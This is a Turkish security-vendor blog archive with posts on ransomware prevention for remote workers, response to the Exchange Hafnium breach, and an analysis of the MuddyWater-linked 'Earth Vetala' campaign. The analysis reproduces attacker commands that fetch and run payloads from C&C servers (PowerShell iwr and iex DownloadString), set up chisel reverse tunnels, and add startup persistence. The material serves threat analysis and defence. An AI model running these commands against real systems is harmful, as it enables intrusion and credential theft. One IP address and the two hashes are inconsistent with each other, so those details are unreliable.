Kategori arşivi: Genel

Evden Çalışırken Fidye Yazılımları Önleme

Birçok çalışan evinde üstünkörü çalışma alanları oluşturuyor. Bu tür çalışma ortamları, çalışanları güvenli olmayan alanlardaki açıklıklardan faydalanmaya çalışan fidye yazılımlara karşı daha savunmasız bırakabiliyor.

Fidye yazılımlar, ofislerin tamamını ve hatta akıllı fabrikaları durma noktasına getirebilecek gelişmiş türleriyle yıllardır kuruluşları ve çalışanları hedef alıyor. Bunlar, genellikle bilgisayarlara kötü amaçlı e-postalar ile bulaşıp önemli dosyaları şifreleyen tehlikeli ve kötü amaçlı yazılımlardır. Uzaktan çalışmanın bir standart haline geldiği günümüz ortamında ise bu tür yazılımlar son derece ciddi bir tehdittir. Çalışma düzeninde yaşanan ani değişiklik, çok sayıda çalışanın güvenli olmayan ev ağlarını ve ortak alanları kullanarak üstünkörü ofisler kurmasına neden oldu. Evden çalışanlar, birden fazla e-postayı açmak gibi gündelik işlemlerden faydalanmaya çalışan bu kurnaz saldırılara karşı çok daha savunmasız.

Bu saldırılarda kötü amaçlı yazılımlar aynı ağdaki diğer bilgisayarlara bulaşıp bir cihazdan diğerine geçerek tüm bilgisayarları kullanılamaz hale getirebiliyor. Bu da başarılı fidye yazılım saldırılarının büyük zararlara yol açabileceği anlamına geliyor. Evden çalışan tek bir kişinin bilgisayarının ele geçirilmesi, tüm kurumsal ağı etkileyen bir saldırının başlangıç noktası olarak kullanılabiliyor. Kurumsal ağın ele geçirilmesinin ardından, fidye yazılım saldırganları genellikle tüm dosyalarının şifresini çözmek ve kullanıcının ya da kuruluşun operasyonlarını normal bir şekilde devam ettirebilmesine izin vermek için yüklü miktarda ödeme talep ediyor.

Aşağıdaki makale, evden çalışan kişilere fidye yazılım saldırılarının nasıl işlediği hakkında genel bir bakış sunmakta ve evlerde oluşturulan ofis ortamlarındaki zayıf noktalara yönelik eyleme dönüştürülebilir bilgiler sağlamaktadır. Ayrıca, bu makalede, çalışanların bu tehditlere karşı nasıl birlikte korunabileceklerine ilişkin önlemlerden oluşan bir liste de sunuyoruz.

Fidye Yazılım Saldırıları Nasıl İşliyor?

Fidye yazılım saldırganları genellikle büyük hedeflerin peşindedir. VPN ağı üzerinden bağlanacağınız kurumsal ağlara veya iş ya da dosya paylaşımı amacıyla kullandığınız bulutta barındırılan ortamlara erişmek isterler. Amaçları ise kuruluşunuzun tüm ağını ele geçirerek verilerinizi önce çalmak sonrasında da şifrelemektir.

pastedGraphic.png

Şekil 1. Tipik bir fidye yazılım bulaşma zinciri örneği

Oltalama e-postaları, fidye yazılım saldırganlarının en yaygın olarak kullandığı yöntemdir. Bu kötü amaçlı aktörler, tehditle karşılaşabileceğinden şüphe duymayan kullanıcıları hedef alır ve bu kişilerin kötü amaçlı yazılımlar içeren web sitesi bağlantılarına tıklamalarını ya da fidye yazılımın bulaşma sürecini başlatan tehlikeli dosyaları indirmelerini sağlama konusunda uzmandır. Aşağıda, fidye yazılımlarının savunmasız ev kurulumlarına girmesinin yollarından bazıları verilmiştir:

  • Fidye yazılımın görev yükünün tamamını gönderebilmek için e-posta hesaplarını, uzak masaüstü araçlarını (Microsoft Remote Desktop veya RDP), bulut tabanlı depolama alanlarını/ağları ve benzer ortamları hedef almak. Saldırganlar bunu oltalama e-postaları yoluyla yapabilir veya belirli araçları tarayıp sonrasında parolayı tahmin etmeye çalışabilirler (bu yöntem kaba kuvvet olarak bilinir). EvilQuest adlı yeni bir Mac fidye yazılımı, siz yazarken parolaları yakalayarak fidye yazılım saldırganlarının verileri çalmasına ve kurumsal portalda oturum açtığınızda bunları kötü amaçlı yazılımı bulaştırmak için kullanmasına olanak tanıyan bir tuş kaydediciye sahiptir.
  • Kötü amaçlı yazılımlar için VPN ağınızı veya uzak masaüstü yazılımınızı hedeflemek. Bunu yapmanın en popüler yollarından biri de yine oltalama yöntemi. Bunun yanı sıra, saldırganlar kötü amaçlı yazılımları torrent sitelerinde veya uygulama mağazalarına yüklenen uygulamalardaki popüler yazılımlara da gizleyebiliyor.
  • Açıklıkları, varsayılan parolaları veya kolay tahmin edilebilir şifreleri kullanarak akıllı ev cihazlarını ve yönlendiricileri hedeflemek. Tehdit aktörleri bu cihazları hedefleyerek çalışanların ev ağlarını kurumsal ağlara ulaşmak için kullanmaktadır.

Fidye Yazılımlardan Nasıl Korunabilirsiniz?

Uzaktan çalışan kişiler, yeni fidye yazılımların neden olacağı peş peşe riskleri azaltmaya yardımcı olmak için nispeten basit adımlar atabilirler. 

Kişisel bilgilerinizi göndermekten kaçının

Bazı kötü amaçlı saldırganlar herkese açık bilgileri ele geçirip bunları daha hassas olan kişisel bilgilere erişmek ya da cihazınıza kötü amaçlı yazılımlar gönderip dağıtmak için kullanabilir. Bu bilgiler genellikle sosyal medya sitelerinden ve herkese açık profillerden alınır. İnternette hangi bilgileri paylaştığınız konusunda dikkatli olun. Yalnızca gerçekten gerekli durumlarda özel bilgilerinizi sağladığınızdan emin olun.

Parola hijyeninizi güçlendirin 

Evden çalışanlar, e-posta ve diğer hesaplarının parolaları için en iyi uygulamaları benimsemelidir: Parolalarınız en az sekiz karakter ve sembolden oluşmalı; tekrarlar, art arda sıralamalar veya desenler içermemeli ve birbirinden farklı olmalıdır. Bazı çevrimiçi kurumsal araçlar ve portallar saldırganların kaba kuvvet uygulayabileceği varsayılan değerlere sahip olabilir. Bu yüzden parolalarınızı düzenli olarak değiştirmek ve çok faktörlü kimlik doğrulaması kullanmak en iyisidir. Ayrıca, birden fazla parolayı ve oturum açma kimliğini tek bir güvenli konumda saklamak için parola yöneticisi kullanmak oldukça iyi bir yöntemdir.

Windows kullanıcıları Dosya Uzantılarını Göster seçeneğini etkinleştirmelidir

Dosya Uzantılarını Göster, kullanıcılara açılmakta olan dosyanın hangi türde olduğunu gösteren yerleşik bir Windows işlevidir. Bazı durumlarda kötü amaçlı saldırganlar “photo.avi.exe.” örneğindeki gibi iki adet uzantı şeklinde görünen dosya isimleri kullanır. Kullanıcılar, ne açtıklarını kontrol etmek ve şüpheli görünen dosyalardan kaçınmak için bu Windows özelliğini kullanmalıdır.

Yalnızca güvenilir e-posta eklerini açın 

Fidye yazılımlar genellikle kötü amaçlı eklentiler içeren istenmeyen e-postalar ile bulaşır ve birçok saldırgan, kullanıcıların dikkatini çekecek en etkili konu başlıkları konusunda uzmandır. Ayrıca, saldırganlar kötü amaçlı görev yüklerini çoğu zaman yaygın dosya türlerinde gönderir. Jpeg dosyaları, Word belgeleri Excel sayfaları ve ofislerin sürekli kullandığı diğer eklentilerde bu tür yazılımlar bulunabilir. Kullanıcılar başta kuruluşlarında çalışmayan kişiler olmak üzere bilinmeyen gönderenlerden gelen e-posta eklerine karşı dikkatli olmalıdır. Bazı fidye yazılım aktörleri ise gönderdikleri spam postalarda alışılmadık dosya türleri kullanır ve kullanıcıların bunlara bakmadan hemen tıklayacaklarına güvenir. Bu postalara karşı dikkatli olun ve şüpheli dosya uzantılarını (.EXE, .VBS veya .SCR gibi) açmayın. Hatta dilerseniz siz de bazı kullanıcıların yaptığı gibi web posta sunucularını bu ekleri engelleyecek şekilde yapılandırabilirsiniz. 

Bilgisayarınızda şüpheli davranışlar gerçekleşiyorsa internet bağlantısını devre dışı bırakın

Fidye yazılımların şifreleme işlemini tamamlaması için genellikle bir komuta ve kontrol (C&C) sunucusuna bağlanması gerekir. İnternet erişimi olmadığında, fidye yazılım bulaştığı cihazda kullanılamaz hale gelecektir. Kullanıcı saldırının ilk aşamalarında fidye yazılımı tespit etmeyi başarırsa internet erişimini devre dışı bırakarak olası zararları azaltabilir. 

Kullanabileceğiniz tüm araçlardan ve güvenlik özelliklerinden yararlanın

Birçok cihaz ve yazılım halihazırda entegre edilmiş olan ve sürekli güncellenen güvenlik özelliklerine sahiptir. Ev tipi yönlendiricinizin ürün yazılımını, bilgisayarlarınızın işletim sistemlerini ve yazılımını, mobil cihazlarınızı ve tarayıcıları en son sürüme güncelleyin. Buna, şirketinizdeki tüm sanal araçlar ve VPN’ler de dahildir. Ayrıca, tüm cihazların güncel ağları ve güvenilir satıcılardan alınan uç nokta güvenliği çözümlerini çalıştırması gerekir. (Bu çözümler izinsiz giriş önleme, web tehdidi koruması, istenmeyen postaları önleme, kimlik avı koruması ve tabii ki fidye yazılımı önleme özelliklerini içermelidir.) Trend Micro Maximum Security yazılımı PC’ler, mobil cihazlar ve Mac’ten oluşan uç cihazlar için kapsamlı koruma sağlar. Bu koruma sayesinde fidye yazılım gibi tehditleri önleyebilir ve kötü amaçlı oltalama e-postalarını engelleyebilirsiniz.

Fidye Yazılımların Yol Açtığı Riskler

Uzaktan çalışan ve fidye yazılımların kurbanı olan şansız kişiler, eğer yedekleri yoksa büyük ihtimalle verilerinin çoğunu kaybedecek ve kötü amaçlı yazılım şirketlerindeki BT ekibi tarafından kaldırılmadıkça bilgisayarlarını kullanamayacaklardır. Yaşanabilecek en kötü senaryo ise kötü amaçlı yazılımın bu kullanıcıların bilgisayarlarını saldırının başlangıç noktası olarak kullanıp şirket ağına sızması olacaktır. Son zamanlarda fidye yazılım saldırganları yalnızca kurbanlarının dosyalara erişimini engellemekle kalmıyor. Fidyeyi ödememeleri durumunda da kurbanlarını verileri ifşa etmekle tehdit ederek “çifte şantaj tekniğini” kullanıyorlar.

Bir fidye yazılımın başarılı olması halinde kurtarma maliyetleri oldukça yüksektir. Değerli verilerin kaybedilmesine ek olarak, makinelere erişim sağlanamadığı için durmak zorunda kalan işlemler, şirketin kar hanesini büyük ölçüde etkiler. Saldırıdan zarar görmeleri halinde cihazların yeniden yüklenmesi veya değiştirilmesi gerekebileceğinden bahsetmemize gerek bile yok. Bununla ilgili yaşanan en kötü örneklerden biri, nakliye devi Maersk’in karıştığı olaydır. Şirket, saldırı sonrasında işlerinin kesintiye uğraması ve kurtarma masrafları nedeniyle 300 milyon ABD doları ödemek zorunda kaldı.

Fidye yazılımların beraberinde getirdiği riskler hem uzaktan çalışanlar hem de kuruluşlar için oldukça ciddidir. Bununla birlikte, tehdidi yönetmenin ve azaltmanın en iyi yolu, interneti kullanırken şüpheli davranışları tespit etmek için daima tetikte olmak ve yukarıda özetlenen en iyi uygulamaları takip etmektir. Her geçen gün daha fazla kuruluşun ve çalışanın uzaktan çalışma alanlarını benimsediği günümüzde, yeni normalimiz çalışma ortamını güvenli hale getirmek olmalıdır.

Siber Suç ve Dijital Tehditler, Fidye Yazılımlar, Kurumsal yazılarında yayınlanmıştır.

Microsoft Exchange Saldırısından Etkilendim, Ne Yapmalıyım?

Kısa süre önce gerçekleşen Microsoft Exchange Server saldırısı gibi büyük boyutlu siber casusluk saldırılarına nadiren tanık oluyoruz. Microsoft’a göre saldırının arkasında, Çin’in desteklediği ve dört güvenlik açığını kötüye kullanan bir saldırgan grubu var.

Yazar: Trend Micro

8 Mart 2021

Okuma süresi: 2 dakika

Sadece ABD’de 30 bin kurumun saldırıdan etkilendiği düşünülüyor. Bilgisayar korsanlarının kurbanların sistemlerini uzaktan kontrol ettiği düşünüldüğünde ise dünya çapındaki rakamlar daha çarpıcı olabilir. Shodan platformu üzerinden gerçekleştirdiğimiz son kontrollerde, bu güvenlik açıklarını gidermeyen 63 bin civarında korunmasız sunucu olduğunu tespit ettik.

Kurumların önceliği Microsoft’un sağladığı yamaları kullanarak sunucuların açıklarını kapatmak olmalıdır. Ancak yamaların hemen uygulanamayacağı durumlarda korunmasız sunucuların İnternet bağlantısı vakit kaybedilmeden kesilmelidir. Bu sırada Exchange sunucusuyla çalışan herkesin olası güvenlik ihlallerini tespit etmek için sistemlerini kontrolden geçirmesi gerekiyor.

Hem Microsoft’un hem de diğer otoritelerin konuyla ilgili önerilerine tamamen katıldığımızı belirtelim. Ayrıca XDR müşterileri, Trend Micro Vision One’daki hazır sorgu kalıplarını kullanarak sistemlerinin güvenliğinin ihlal edilip edilmediğini kontrol edebilir. Bu sorgu kalıplarına Knowledge Base bölümünde yayınladığımız yazıdan erişebilirsiniz. Aynı yazıda müşterilerimizin tüm güvenlik çözümlerinde uygulayabileceği ek tespit sistemleri ve koruma önlemlerinden de bahsettik.

Peki ne olmuştu?

Saldırıların izi şimdilik, Microsoft Exchange Server’daki dört farklı sıfır gün güvenlik açığının kötüye kullanılmaya başladığı 6 Ocak 2021 tarihine kadar sürülebildi. Saldırıyı gerçekleştiren yeni bilgisayar korsanlarına Microsoft sonradan “Hafnium” adını verdi. Saldırganlar, gerçek adreslerini gizlemek için ABD’de bulunan sanal özel sunucuyu (VPS) kullandı. Microsoft, her zamanki rutin yama tarihlerinin dışına çıkarak bir acil durum yaması yayınladı. Yamanın açıklama bölümünde Microsoft konuyla ilgili bazı konulara değindi:

“Saldırganlar, incelediğimiz saldırılarda güvenlik açıklarından yararlanarak e-posta hesaplarına erişime izin veren kurum içi Exchange sunucularına sızdı. Güvenlik açıkları, sızılan sistemlere uzun vadeli erişimi kolaylaştıran başka kötü amaçlı yazılımların kurulmasına neden oldu.”

Bu açıkların her biri art arda kullanılsaydı saldırganlar kendilerini yetkili Exchange sunucusu gibi tanıtabilir, Sistem kimliği altında kod çalıştırabilir ve sunucudaki yollara istedikleri dosyaları yazabilirlerdi. Hafnium grubunun, dört güvenlik açığını kötüye kullandıktan sonra saldırıyı bir adım ileriye taşıyarak kurbanlarının bilgilerini çalmaya devam etmek ve başka kötü amaçlı saldırılarda bulunabilmek için sistemlere web kabukları yerleştirdiği söyleniyor. Bu saldırılar kapsamında, kurumları zarara uğratabilecek fidye yazılımlar da sistemlere yüklenebilirdi.

Hem Beyaz Saray hem de ABD Siber Güvenlik ve Altyapı Güvenliği Kurumu (CISA) saldırıların geniş kapsamlı olabilecek sonuçlarından ötürü oldukça kaygılı. CISA, devlet kurumlarındaki Exchange sunucularının vakit kaybedilmeden güncellenmesi veya İnternet bağlantılarının kesilmesine dair bir talimat yayınladı.

Saldırılar, 2021 Ocak’ında yayınladığımız Chopper ASPX web kabuğu araştırmasıyla da bağlantılı olabilir. Trend Micro Research’ün, saldırıların birbiriyle nasıl ilişkili olduklarına ve gelecekte başka saldırılar olup olmayacağına dair analizleri devam ediyor.

Saldırıdan etkilendim mi?

Microsoft’un yaptığı ilk değerlendirmede, Hafnium’un bulaşıcı hastalık araştırmaları, hukuk, yüksek öğrenim, savunma, siyasetle ilgili düşünce kuruluşları ve STK’lar gibi sektörlerdeki kuruluşları hedef aldığı iddia edildi. Ancak, geniş kapsamlı en son saldırı dalgasında başka saldırganların da furyaya katılmış olabileceğine dair görüşler öne sürülüyor. CISA’nın eski şefi Chris Krebs, kaynağı ne olursa olsun bu saldırıların, genellikle güvenliğe az kaynak ayırabilen KOBİ’leri, eğitim sektöründeki kurumları ve eyaletlerle yerel yönetimleri daha şiddetli etkilenmiş olabileceğini düşünüyor.

Kurumunuzdaki Exchange Server sistemlerinin saldırıdan etkilenip etkilenmediğini aşağıdaki talimatları takip ederek kontrol edebilirsiniz:

  • Sunuculara sızılıp sızılmadığını kontrol etmek için Microsoft detection tool yazılımı aracılığıyla Exchange Server sistemlerinin kayıt günlüklerini tarayın.
  • Bu saldırıyla ilgili sızmayı somut olarak işaret eden göstergeleri (IoC) tespit etmek için Trend Micro Vision One aracılığıyla tarama yapın.

Bu adımlardan sonra ne yapmalıyım?

Taramanız sistemin güvenliğinin ihlal edilmediğini gösterdiyse ancak yamaları henüz yüklememişseniz, Microsoft’un sitesine giderek yamaları yükleyin.

Microsoft’un aracını kullanarak yaptığınız taramada sisteminizin güvenliğinin ihlal edilmiş olabileceğine dair kanıtlara rastlanmışsa bu güvenlik ihlalini bildirmeniz gerekmektedir.

Ancak izleyeceğiniz prosedürler kurum içi kaynaklara ve içinde bulunduğunuz şartlara göre değişir. KOBİ’ler ve büyük şirketler için tavsiyelerimiz aşağıdadır:

  1. Kurum içinde bir güvenlik ekibiniz yoksa, güvenlikle ilgili destek aldığınız hizmet sağlayıcısına veya Yönetimli hizmet Sağlayıcınıza başvurun.
  2. Kurum içinde güvenlik açıklarına müdahale edebilecek bir ekibiniz varsa atmanız gereken adımlara bu ekip karar verecek.
  3. Sızmayı somut olarak işaret eden göstergelerin sisteminizde olduğundan emin olmak için kapsamlı bir tarama yapılana kadar sistemlerinizi başka cihazlara kopyalamayın.
  4. Güvenlik ihlaliyle ilgili bildirim gereklilikleriyle hakkında bilgi almak için hukuk biriminizle görüşün.

Trend Micro’nun bu saldırıya özel tespitleri ve ek güvenlik önlemleri hakkında daha fazla bilgi edinmek için Knowledge Base bölümünde yayınladığımız ve yeni bilgiler aldıkça güncellediğimiz yazıyı inceleyebilirsiniz: https://success.trendmicro.com/solution/000285882.

MuddyWater Saldırısı MENA’daki Kuruluşları Hedef Almaya Devam Ediyor

Trend Micro araştırmacıları kısa bir süre önce MuddyWater kaynaklı olduğundan şüphelenilen bir etkinlik tespit etti. Bu girişim, Orta Doğu’daki ve komşu bölgelerdeki çeşitli kuruluşları hedef alıyor.

Trend Micro araştırmacıları kısa bir süre önce Orta Doğu’daki ve komşu bölgelerdeki çeşitli kuruluşları hedef alan bir etkinlik tespit etti. Anomali şirketinin gerçekleştirdiği ve benzer kurbanları hedef alan farklı bir girişimi de ortaya çıkaran bir araştırma sonucunda bu etkinlikten haberdar olduk. Kesin olmamakla beraber, tespit edilen bu yeni etkinliğin MuddyWater (TEMP.Zagros, Static Kitten, Seedworm olarak da bilinmektedir) saldırısı ile bağlantılı olduğunu düşünüyoruz.

Ayrıca, Anomali şirketinin tespit ettiği etkinlik ve 2021 yılında da devam eden girişim arasında bir ilişki bulduk. Bu girişim aşağıdaki yasal uzaktan yönetim araçlarını kullanmaktadır:

Yetkisiz erişim elde etmeyi amaçlayan bu saldırılara Earth Vetala adını verdik. Earth Vetala saldırısında, kötü amaçlı paketleri göndermek için yasal dosya paylaşım hizmetlerine gömülü bağlantılar içeren hedefli kimlik avı e-postaları kullanıldı. Bu linkler e-postaların yanı sıra tuzak niteliğindeki belgelere de gömülmüştü.

Bir kurbana erişim sağlandığında, saldırganlar erişilen kullanıcı hesabının bir yöneticiye mi yoksa normal bir kullanıcıya mı ait olduğu belirleyebiliyordu. Sonrasında ise parola/işlem dökümü yardımcı araçlarının, ters tünel oluşturma araçlarının ve özel arka kapıların dahil olduğu saldırı sonrası araçları indiriyorlardı. Bu aşamalardan sonra tehdit aktörleri, karmaşık PowerShell komut dosyalarını yürütmek için ek komut ve kontrol (C&C) altyapılarını kullanarak iletişimi başlatıyordu.

Genel Bakış

Yapılan analizler, Earth Vetala girişiminin devam etmekte olduğunu ve bu tehdit faktörünün İran’ın hedeflerine uygun görünen çıkarlar içerdiğini gösteriyor.

Earth Vetala saldırısı başladığı günden beri Orta Doğu’daki ülkeleri hedef almaktadır. Bu girişimde Earth Vetala saldırısının tehdit aktörleri, hedefli kimlik avı e-postalarını ve tuzak niteliğindeki belgeleri kullanarak Birleşik Arap Emirlikleri, Suudi Arabistan, İsrail ve Azerbaycan’daki kuruluşları hedef almıştır. Bu kimlik avı e-postaları ve tuzak niteliğindeki belgeler, ScreenConnect uzak yönetici aracını içeren arşivleri dağıtmak için yasal dosya paylaşım hizmetlerine bağlanan gömülü URL’ler içerir. ScreenConnect, sistem yöneticilerine kurumsal sistemlerini uzaktan yönetme olanağı tanıyan yasal bir uygulamadır.

Yaptığımız araştırmada Anomali şirketinin tespit ettiği aynı girişimle bağlantılı tehdit aktörleri bulduk. Analizler, Earth Vetala saldırısının bu yazının yayınlandığı tarih itibariyle hala devam etmekte olduğunu gösteriyor. Bu girişimde tehdit aktörleri, parolaları ele geçirmek ve açık kaynaklı araçları kullanarak C&C iletişimlerine tünel oluşturmak için saldırı sonrası araçlarını; hedeflenen ana bilgisayarlar ve ortamlarda kalıcı bir varlık oluşturmak için ise ek C&C altyapısını kullanmaktadır.

Teknik Analiz

Araştırmamız sırasında, bir devlet kurumundan gönderildiği iddia edilen hedefli bir kimlik avı e-postası tespit ettik.

Şekil 1. Gömülü URL içeren kimlik avı e-postası

Bu e-posta, alıcıları URL’ye tıklamaları ve kötü amaçlı bir dosyayı indirmeleri için ikna etmeye çalışır. Biri .PDF dosyası ve diğeri .RTF dosyası olmak üzere iki dosyadan birinin indirilebileceğini gördük.

Tıpkı hedefli kimlik avı e-postasında olduğu gibi, tuzak niteliğindeki belgelerin içeriği de kurbanı başka bir kötü amaçlı URL’ye tıklaması ve bir .ZIP dosyasını indirmesi için ikna etmeye çalışır.

Bu .ZIP dosyası, RemoteUtilities tarafından geliştirilen yasal bir uzaktan yönetim yazılımının kopyasını içerir ve aşağıdakilerin de dahil olduğu uzaktan yönetim yeteneklerini sağlar:

  • Dosyaları indirme ve yükleme
  • Ekran görüntüleri alma
  • Dosyalara ve dizinlere göz atma
  • İşlemleri yürütme ve sonlandırma

Araştırmamızda, RemoteUtilities uzaktan yönetim yazılımını yukarıdaki yöntemle dağıtmak için kullanılan birden fazla .ZIP dosyasıyla karşılaştık. Bu dosyaların tümü aynı RemoteUtilities örneğini dağıtıyordu. Bu aracın kullanılması, ScreenConnect’in kullanıldığı daha önceki saldırılar gibi bu girişimi de diğer araştırmalardan ayırır. Aksi takdirde kullanımda olan TTP verileri genel olarak benzer kalacaktır.

RemoteUtilities Analizi

RemoteUtilities yazılımı yürütüldüğünde aşağıdaki komutla msiexec.exe uygulaması başlatılır:

pastedGraphic.png

Şekil 4. RemoteUtilities Kurulumu

MSI yükleyicisi, hedef makineye Uzak Yardımcı Programlar – Ana Bilgisayar adlı bir hizmet yükler:

pastedGraphic_1.png

Şekil 5. Uzak Yardımcı Programlar Hizmeti

Sonrasında, yüklenen hizmet RemoteUtilities’e ait olan id.remoteutilities.com etki alanıyla iletişim kurar. Bu bağlantı, etki alanındaki İnternet Kimliği Bağlantısı adı verilen bir özellikle ilgilidir. Bu özellik, bir ara İnternet sunucusunun tıpkı proxy sunucuları gibi bağlantıya aracılık etmesine olanak tanır. Böylece tehdit aktörü, sonrasında asıl RemoteUtilities ana bilgisayarına bağlanacak olan Internet-ID sunucusu ile bağlantı kurar.

pastedGraphic_2.png

Şekil 6. kod sunucusu bağlantısı

Saldırı Sonrası Analizi

Araştırmamızda, Suudi Arabistan’da bulunan ve ScreenConnect uzaktan yönetim yazılımını kullanan güvenliği ihlal edilmiş bir ana bilgisayar tespit ettik. Kurbanlar yürütülebilir bir ScreenConnect dosyası (SHA256 karması: 2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf) içeren kötü amaçlı bir .ZIP dosyası (SHA256 karması: b2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf) ile hedeflenmişti

Yukarıda da belirttiğimiz gibi, bu ScreenConnect yürütülebilir dosyası, instance-sy9at2-relay.screenconnect.com adresinde bulunan ve 51.68.244.39’a çözümlenen internet kimliği sunucusuna bağlanır.

Söz konusu etki alanına bir önceki araştırmamızda da değinmiştik. Daha sonrasında ise bu tehdit aktörlerinin ScreenConnect yazılımını kullanarak güvenliği ihlal edilmiş ana bilgisayarla aşağıdaki komutları çalıştırarak etkileşimde kurduğunu gözlemledik.

cmd.exe net kullanıcı/etki alanı

Yukarıdaki komut, saldırganın etki alanı denetleyicisindeki tüm kullanıcılara erişmesini sağlar.

Yürütülen bir sonraki komut ise şudur:

powershell.exe -exec bypass -w 1 -file a.ps1

Bu, bazı türdeki PowerShell komut dosyalarını yürütmek için kullanılan bir komuttur. Fakat bu a.ps1 dosyasına erişimimiz yoktu. Bu yüzden burada hangi işlevin sağlandığı konusunda net bir bilgimiz yok.

Gönderilen bir diğer komut da şudur:

powershell.exe iwr -uri http://87.236.212[.]184/SharpChisel.exe -outfile c:\programdata\SharpChisel.exe -usebasicparsing

Bu komut 187.236.212[.]184’e bağlanır ve SharpChisel.exe (SHA256: 61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2) adlı bir dosyayı indirerek bunu C:\programdata dizinine kaydeder. SharpChisel ismi, bu dosyanın amacıyla ilişkili olabilir. Dosyanın hedefi, “chisel” olarak adlandırılan bir tünel oluşturma aracına yönelik C# sarmalayıcısıdır. Yukarıdaki IP adresi, İran’daki bir sunucuya konumlandırılmıştır.

Bir sonraki aşamada aşağıdaki komut SharpChisel’i yapılandırır:

C:\programdata\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999

Bu işlem, tüm trafiği 9999 bağlantı noktasındaki yerel ana bilgisayarla aynı uzak sunucuya yönlendirir.

Ardından farklı ayarlara sahip başka bir SharpChisel örneği, bu defa aşağıdaki komut satırını kullanarak PowerShell ile yürütülür:

powershell.exe C:\programdata\SharpChisel.exe client 87.236.212[.]184:443 R:8888:127.0.0.1:9999

Bu sefer trafik, sunucuya 443 numaralı bağlantı noktası üzerinden iletilecektir.

23.95.215.100:8080 konumunda farklı bir C&C sunucusuna bağlanan üçüncü bir SharpChisel örneği aşağıdaki komutla başlatılır:

C:\programdata\SharpChisel.exe client 23.95.215[.]100:8080 r:8888:127.0.0.1:9999

Sonrasında bu komut aşağıdaki PowerShell komut satırı ile yapılandırılır:

powershell.exe C:\programdata\SharpChisel.exe client 23.95.215[.]100:8080 R:8888:127.0.0.1:9999

Söz konusu tehdit aktörünün SharpChisel’i düzgün çalışacak şekilde yapılandıramadığını düşünüyoruz. Aşağıdaki komutun kullanılması, bize bu varsayımımızı destekleyecek ek bir gerekçe sunuyor:

powershell.exe iwr -uri hxxp://87.236.212[.]184/procdump64.exe -outfile c:\programdata\procdump64.exe -usebasicparsing

Bu komut C&C sunucusuna bağlanır, procdump64.exe dosyasını indirir ve bunu C:\programdata dizinine kaydeder. Bu da SharpChisel’in düzgün bir şekilde yapılandırılamadığına ilişkin varsayımımızı desteklemektedir. Saldırgan procdump64.exe yardımcı programını indirmek ve çalıştırmak için bu dosya yerine PowerShell’i kullanır.

pastedGraphic_3.png

Şekil 7. LIGOLO yürütme örneği

Bu işlem iki farklı komut kullanılarak yapılır:

C:\programdate\1.exe -relayserver 87.236.212[.]184:5555

C:\users\public\new.exe -relayserver 87.236.212[.]184:5555

Bu işlemin sonrasında tehdit aktörünün aşağıdaki komutu kullanarak SharpChisel’i birkaç kez tekrar kullanmaya çalıştığını görüyoruz:

C:\programdata\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999
powershell.exe C:\programdata\SharpChisel.exe client 87.236.212[.]184:8080 R:8888:127.0.0.1:9999

İki farklı araç kullanılarak denenmesine rağmen C&C sunucusuna yönelik bir tünel bağlantısının kurulamadığı sonucuna vardık.

C&C sunucularına yönelik tünel bağlantısını yapılandırma girişimin başarısız olmasının ardından, tehdit aktörleri bir uzaktan erişim aracı (RAT) indirerek bunu yapılandırmayı denedi. Bunun için aşağıdaki PowerShell komutu kullanıldı:

powershell.exe iwr -uri hxxp://87.236.212[.]184/out1 -outfile c:\users\public\out1.exe -usebasicparsing

Bu komut, out1.exe dosyasını indirir ve C:\users\public\ dizinine kaydeder. Bir UPX paket açıcı kullanarak yürütülebilir bir Python dosyasını içeren dosya içeriğini ayıklamayı başardık. Ardından, Python bytecode dosyalarının tümünü almak için pyinstxtractor.py kullanarak yürütülebilir python dosyasının derlemesini açtık. Bunlar sonraki aşamada orijinal phyton kodunu elde etmek için easypythondecompiler kullanılarak kaynak koda dönüştürülür.

out1.exe RAT aşağıdaki yeteneklere sahiptir:

  • Veri kodlaması
  • E-posta ayrıştırma
  • Dosya ve kayıt defteri kopyalama
  • HTTP/S bağlantısı desteği
  • Yerel komut satırı
  • İşlem yapma ve dosya yürütme

Bu aşamanın ardından C:\users\public\Browser64.exe dosyası çalıştırılır. Browser64, aşağıdaki uygulamalardan kimlik bilgilerini alan bir araçtır:

  • Chrome
  • Chromium
  • Firefox
  • Opera
  • Internet Explorer
  • Outlook
pastedGraphic_4.png

Şekil 8. Browser64.exe Kullanım Örneği

Browser64.exe kullanıldıktan sonra aşağıdaki komutun çalıştırıldığını gözlemledik:

powershell.exe iex(new-object System.Net.WebClient).DownloadString(‘hxxp://23.94.50[.]197:444/index.jsp/deb2b1a127c472229babbb8dc2dca1c2/QPKb49mivezAdai1’)

Bu aşamada saldırganlar SharpChisel’i tekrar kullanmayı denedi ve başarısız oldu:

powershell.exe C:\programdata\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999

C:\programdata\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999

C:\programdata\SharpChisel.exe server -p 9999 –socks5

Son olarak, aşağıdaki komutlar kullanılarak bir kalıcılık mekanizmasının oluşturulduğunu gözlemledik:

cmd.exe /c Wscript.exe “C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\news.js”

cmd.exe /c “C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\newsblog.js”

newsblog.js‘nin bir kopyasını elde etmeyi başardık. Bu dosya, aşağıdaki URL ile iletişim kuran basit bir VBS indirme programıdır:

hxxp://23[.]95[.]215[.]100:8008/index.jsp/7e95a3d753cc4a17793ef9513e030b49/4t2Fg7k6wWRnKgd9

pastedGraphic_5.png

Şekil 9. newsblog.js

Bu komut dosyası yeni bir HTTP nesnesi oluşturur ve sonrasında sistemin yerel proxy ayarlarını devre dışı bırakmaya çalışır. Bu işlemin ardından komut dosyası C&C URL’sinde bir HTTP GET isteği uygular, sunucunun yanıtını alır ve 10 saniye boyunca uyku moduna geçer.

Analizimiz esnasında bu sunucu hala kullanılabiliyordu. Sunucudan gelen yanıt, bellekte çalıştırılan kodlanmış bir PowerShell komut dosyasını içerir. Bu komut dosyasının kaynak koda dönüştürülmesi sonucunda bir arka kapı içerdiği ortaya çıkmıştır:

pastedGraphic_6.png

